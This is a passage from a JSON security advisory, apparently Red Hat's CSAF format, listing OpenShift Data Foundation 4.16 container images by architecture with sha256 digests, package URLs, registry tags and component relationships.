"name": "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"product_id": "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"product_id": "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"product": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"product_id": "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"product": {
"name": "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"product_id": "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"product_id": "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"product": {
"name": "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"product_id": "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"product": {
"name": "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"product_id": "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.16.3-1"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"product_id": "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e?arch=arm64\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"product_id": "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2?arch=arm64\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8?arch=arm64\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"product_id": "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f?arch=arm64\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"product_id": "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"product_id": "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"product_id": "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"product_id": "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.16.3-1"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64"
},
"product_reference": "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le"
},
"product_reference": "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x"
},
"product_reference": "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64"
},
